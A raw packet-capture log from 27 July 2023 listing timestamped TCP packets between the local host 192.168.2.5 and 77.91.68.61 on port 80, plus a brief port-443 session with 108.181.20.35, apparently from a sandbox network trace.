Jul 27, 2023 01:35:31.162061930 CEST	50277	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.206366062 CEST	80	50277	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.212196112 CEST	80	50277	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.212335110 CEST	50277	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.331923962 CEST	50277	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.332894087 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.380654097 CEST	80	50277	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.380759001 CEST	50277	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.380917072 CEST	80	50278	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.381021976 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.381724119 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.426260948 CEST	80	50278	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.430825949 CEST	80	50278	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.430949926 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.540755987 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.541670084 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.585685015 CEST	80	50278	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.585851908 CEST	50278	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.586069107 CEST	80	50279	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.586198092 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.611447096 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.656049967 CEST	80	50279	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.659985065 CEST	80	50279	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.660407066 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.771239042 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.772208929 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.815736055 CEST	80	50279	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.816395044 CEST	50279	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.816613913 CEST	80	50280	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.816723108 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.818039894 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.862386942 CEST	80	50280	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.865866899 CEST	80	50280	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.865992069 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.973097086 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.973985910 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.017523050 CEST	80	50280	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.017597914 CEST	50280	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.018621922 CEST	80	50281	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.018714905 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.019201040 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.063848019 CEST	80	50281	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.070655107 CEST	80	50281	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.070763111 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.184763908 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.185750961 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.229543924 CEST	80	50281	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.229609966 CEST	50281	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.230449915 CEST	80	50282	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.230541945 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.230972052 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.275552988 CEST	80	50282	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.279985905 CEST	80	50282	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.280148029 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.398837090 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.399779081 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.443536043 CEST	80	50282	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.443636894 CEST	50282	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.443736076 CEST	80	50283	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.443834066 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.452176094 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.496386051 CEST	80	50283	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.500648022 CEST	80	50283	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.500781059 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.620280027 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.621855021 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.664638996 CEST	80	50283	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.664774895 CEST	50283	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.666217089 CEST	80	50284	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.666332006 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.670672894 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.715039968 CEST	80	50284	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.718630075 CEST	80	50284	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.718702078 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.832372904 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.833591938 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.877054930 CEST	80	50284	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.877159119 CEST	50284	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.878150940 CEST	80	50285	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.878262997 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.881206989 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:32.925681114 CEST	80	50285	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.929081917 CEST	80	50285	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:32.930246115 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.039949894 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.040834904 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.085704088 CEST	80	50285	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.085828066 CEST	80	50286	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.085948944 CEST	50285	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.085995913 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.094156981 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.140094995 CEST	80	50286	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.144102097 CEST	80	50286	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.144180059 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.268663883 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.269865990 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.314795971 CEST	80	50286	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.315711975 CEST	50286	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.318327904 CEST	80	50287	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.318459988 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.328664064 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.375752926 CEST	80	50287	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.380466938 CEST	80	50287	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.380572081 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.488750935 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.489571095 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.533255100 CEST	80	50287	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.533413887 CEST	50287	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.534499884 CEST	80	50288	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.535198927 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.540666103 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.585417986 CEST	80	50288	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.588643074 CEST	80	50288	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.588709116 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.720024109 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.720916986 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.764760971 CEST	80	50288	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.765404940 CEST	80	50289	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.765527964 CEST	50288	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.765573978 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.766468048 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.810710907 CEST	80	50289	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.814343929 CEST	80	50289	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.815795898 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.954441071 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.955141068 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.998996973 CEST	80	50289	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.999326944 CEST	80	50290	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:33.999469042 CEST	50289	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:33.999511003 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.024107933 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.068654060 CEST	80	50290	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.072303057 CEST	80	50290	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.073837042 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.207986116 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.216824055 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.253001928 CEST	80	50290	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.255851984 CEST	50290	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.260921955 CEST	80	50291	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.261076927 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.261540890 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.306524992 CEST	80	50291	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.309987068 CEST	80	50291	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.310120106 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.428456068 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.429351091 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.474253893 CEST	80	50291	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.474401951 CEST	50291	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.475735903 CEST	80	50292	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.475964069 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.476248980 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.521081924 CEST	80	50292	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.525054932 CEST	80	50292	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.525156975 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.633133888 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.633975029 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.677666903 CEST	80	50292	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.678401947 CEST	80	50293	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.678725958 CEST	50292	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.678766966 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.685010910 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.729216099 CEST	80	50293	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.734278917 CEST	80	50293	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.734436035 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.849020958 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.849987030 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.893053055 CEST	80	50293	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.893121958 CEST	50293	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.894319057 CEST	80	50294	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.894443035 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.903904915 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:34.948246956 CEST	80	50294	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.952240944 CEST	80	50294	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:34.952328920 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.079283953 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.080859900 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.123564005 CEST	80	50294	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.123632908 CEST	50294	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.125252008 CEST	80	50295	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.125332117 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.125902891 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.170511007 CEST	80	50295	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.175029039 CEST	80	50295	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.175167084 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.286864042 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.287774086 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.331804991 CEST	80	50295	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.331948996 CEST	50295	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.333000898 CEST	80	50296	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.333137035 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.334764957 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.379384041 CEST	80	50296	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.383569956 CEST	80	50296	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.383686066 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.489418030 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.490562916 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.534523010 CEST	80	50296	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.534703016 CEST	50296	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.535329103 CEST	80	50297	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.535463095 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.535993099 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.580442905 CEST	80	50297	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.584462881 CEST	80	50297	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.584990025 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.716733932 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.717648029 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.761610031 CEST	80	50297	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.761717081 CEST	50297	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.762126923 CEST	80	50298	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.762439966 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.762919903 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.807728052 CEST	80	50298	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.811259031 CEST	80	50298	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.811362028 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.928061008 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.928776026 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.972764969 CEST	80	50298	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.972934961 CEST	50298	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.973148108 CEST	80	50299	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:35.973248005 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:35.973613024 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.018101931 CEST	80	50299	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.021589994 CEST	80	50299	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.021724939 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.130397081 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.132471085 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.175489902 CEST	80	50299	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.175585985 CEST	50299	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.177290916 CEST	80	50300	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.177429914 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.177761078 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.222083092 CEST	80	50300	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.226125956 CEST	80	50300	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.226325035 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.335726976 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.336639881 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.380373955 CEST	80	50300	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.380544901 CEST	50300	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.381576061 CEST	80	50301	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.381762028 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.386019945 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.430478096 CEST	80	50301	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.434478998 CEST	80	50301	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.436383009 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.551696062 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.552452087 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.596132040 CEST	80	50301	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.596302986 CEST	50301	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.597131968 CEST	80	50302	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.597279072 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.597651958 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.642705917 CEST	80	50302	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.646898985 CEST	80	50302	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.647080898 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.764241934 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.774147034 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.808721066 CEST	80	50302	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.808903933 CEST	50302	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.819631100 CEST	80	50303	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.819873095 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.834656954 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.879798889 CEST	80	50303	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.883770943 CEST	80	50303	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:36.884052992 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.990170002 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:36.991225004 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.035058975 CEST	80	50303	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.035324097 CEST	50303	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.036124945 CEST	80	50305	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.036221981 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.036910057 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.062381983 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.062438965 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.062666893 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.088243008 CEST	80	50305	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.093763113 CEST	80	50305	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.093929052 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.169867039 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.169908047 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.228173971 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.229055882 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.274094105 CEST	80	50305	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.274318933 CEST	50305	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.274909019 CEST	80	50306	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.275085926 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.275595903 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.320522070 CEST	80	50306	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.325498104 CEST	80	50306	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.325701952 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.452152014 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.453181028 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.497567892 CEST	80	50306	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.497658968 CEST	50306	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.497812033 CEST	80	50307	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.497905016 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.498944998 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.509730101 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.509849072 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.513062000 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.513077974 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.513653040 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.543895960 CEST	80	50307	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.547223091 CEST	80	50307	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.547302961 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.611747026 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.661331892 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.662002087 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.706721067 CEST	80	50307	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.706881046 CEST	50307	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.707631111 CEST	80	50308	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.707762957 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.716734886 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.761939049 CEST	80	50308	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.767486095 CEST	80	50308	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.767625093 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.866621017 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:37.896174908 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.897707939 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.908294916 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:37.942190886 CEST	80	50308	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.942310095 CEST	50308	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.943484068 CEST	80	50309	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:37.943614006 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:37.960289001 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.005225897 CEST	80	50309	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.009547949 CEST	80	50309	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.009659052 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.119247913 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.120111942 CEST	50310	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.164552927 CEST	80	50309	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.164613962 CEST	80	50310	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.164700985 CEST	50309	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.164761066 CEST	50310	80	192.168.2.5	77.91.68.61
